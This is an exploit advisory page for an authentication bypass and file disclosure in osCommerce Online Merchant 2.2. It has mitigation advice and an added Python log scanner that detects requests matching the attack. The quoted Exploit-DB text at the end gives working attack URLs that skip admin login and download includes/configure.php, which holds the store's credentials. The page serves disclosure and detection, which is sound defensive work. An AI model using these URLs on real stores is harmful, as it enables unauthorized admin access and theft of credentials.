Vendor: Oscommerce Online Merchant
By: Flyff666
CVSS: 7,5 (HIGH)
File Disclosure and Admin Bypass
CWE: 200
Product Name: Oscommerce Online Merchant
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: No
Related CWE: N/A
CPE: a:oscommerce:oscommerce_online_merchant
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All OS
2010

Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass

An attacker can bypass the admin page authentication by appending /login.php to the end of an admin script URL (for example /admin/file_manager.php/login.php). Additionally, an attacker can download any file in the directory by appending /login.php?action=download&filename= to the file_manager.php URL.

Mitigation:

Ensure that the admin folder is protected by .htaccess and that the URL is not vulnerable to manipulation.
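
To check whether a store has already received requests of this shape, the access log can be searched for a PHP script followed by extra path information ending in login.php. The following is an added example, not part of the original advisory or of osCommerce; it assumes Common/Combined Log Format, and the log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request field and status code of a Common/Combined Log Format line (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A PHP script followed by extra path info that ends in login.php, e.g.
# /admin/file_manager.php/login.php. A plain /admin/login.php does not match,
# and a renamed admin directory is still covered.
PATHINFO_RE = re.compile(r'/(?P<script>[^/]+\.php)/+login\.php$', re.IGNORECASE)

def classify(line):
    """Return a finding dict for a request shaped like the bypass, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    hit = PATHINFO_RE.search(unquote(parts.path))  # decode %xx before matching
    if not hit:
        return None
    query = parse_qs(parts.query)
    is_download = query.get("action", [""])[0].lower() == "download"
    status = int(m.group("status"))
    return {
        "script": hit.group("script"),
        # Requested file name when the download action is used, else None.
        "download": query.get("filename", [""])[0] if is_download else None,
        "status": status,
        # 2xx: the server answered instead of refusing (401/403) or redirecting.
        "served": 200 <= status < 300,
    }

def scan(lines):
    """Classify every log line and keep only the findings."""
    return [f for f in map(classify, lines) if f is not None]

# Constructed sample log lines (documentation IP ranges, hypothetical /store path).
SAMPLE_LOG = [
    '203.0.113.5 - - [30/May/2010:10:00:01 +0700] "GET /store/admin/login.php HTTP/1.1" 200 1843',
    '203.0.113.9 - - [30/May/2010:10:02:11 +0700] "GET /store/admin/file_manager.php/login.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [30/May/2010:10:02:40 +0700] "GET /store/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php HTTP/1.1" 200 912',
    '198.51.100.7 - - [30/May/2010:11:15:03 +0700] "GET /store/admin/backup.php/login.php HTTP/1.1" 401 381',
    '203.0.113.5 - - [30/May/2010:11:20:00 +0700] "GET /store/index.php HTTP/1.1" 200 7321',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings with "served" set to True and a non-empty "download" value are the ones to triage first, since they indicate a file was returned to the client.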

Exploit-DB raw data:

--------------------------------------------
Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass
--------------------------------------------

Author : Flyff666
Date : May, 30, 2010
Location : Tangerang, Indonesia
Time Zone : GMT +7:00
Software : OsCommerce Online Merchant v2.2
Tested on : All OS
--------------------------------------------
Email : Dream_Theatre@rocketmail.com
gReets : Mywisdom(abang.. wkkwkwk), Kiddies, Chaer, Petimati, c4uR
WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be
Spykit, BobyHikaru, Fribo. all member.
Site : Http://www.Devilzc0de.org/forum/
Forum : Http://Indonesianhacker.or.id/
--------------------------------------------

# ByPass Page Admin :

You can use this trick if the admin folder is not protected by .htaccess

If you want to explore the admin page without logging in, you can put /login.php after the name of the file

Example :

http://[site]/admin/backup.php/login.php

or

http://[site]/admin/file_manager.php/login.php

Demo :

http://server/store/admin/file_manager.php/login.php

You can see all files in the osCommerce directory.. haha ;)

and you can download all files with the trick above


# File Disclosure :

in : admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php